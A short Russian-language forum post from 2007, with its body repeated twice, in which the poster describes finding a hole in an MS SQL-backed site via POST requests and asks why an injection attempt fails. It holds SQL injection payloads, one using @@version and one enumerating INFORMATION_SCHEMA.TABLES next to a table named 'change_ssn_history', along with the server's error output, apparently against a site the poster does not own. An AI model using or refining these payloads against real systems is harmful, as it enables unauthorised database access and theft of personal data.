Isis
03.09.2007, 20:47
Нашел вообщем дыру на сайте...
Стоит MS SQL
POST запросы....
' or 1=@@version-- работает, получается экранирования кавычек нету?так?!
Пробую
' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('change_ssn_history'))--
Здесь ругается:
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in C:\AppServ2\www\index.php on line 17
Warning: mssql_query() [function.mssql-query]: Query failed in C:\AppServ2\www\index.php on line 17
Warning: mssql_num_rows(): supplied argument is not a valid MS SQL-result resource in C:\AppServ2\www\index.php on line 18
Че за?
Стоит MS SQL
POST запросы....
' or 1=@@version-- работает, получается экранирования кавычек нету?так?!
Пробую
' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('change_ssn_history'))--
Здесь ругается:
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in C:\AppServ2\www\index.php on line 17
Warning: mssql_query() [function.mssql-query]: Query failed in C:\AppServ2\www\index.php on line 17
Warning: mssql_num_rows(): supplied argument is not a valid MS SQL-result resource in C:\AppServ2\www\index.php on line 18
Че за?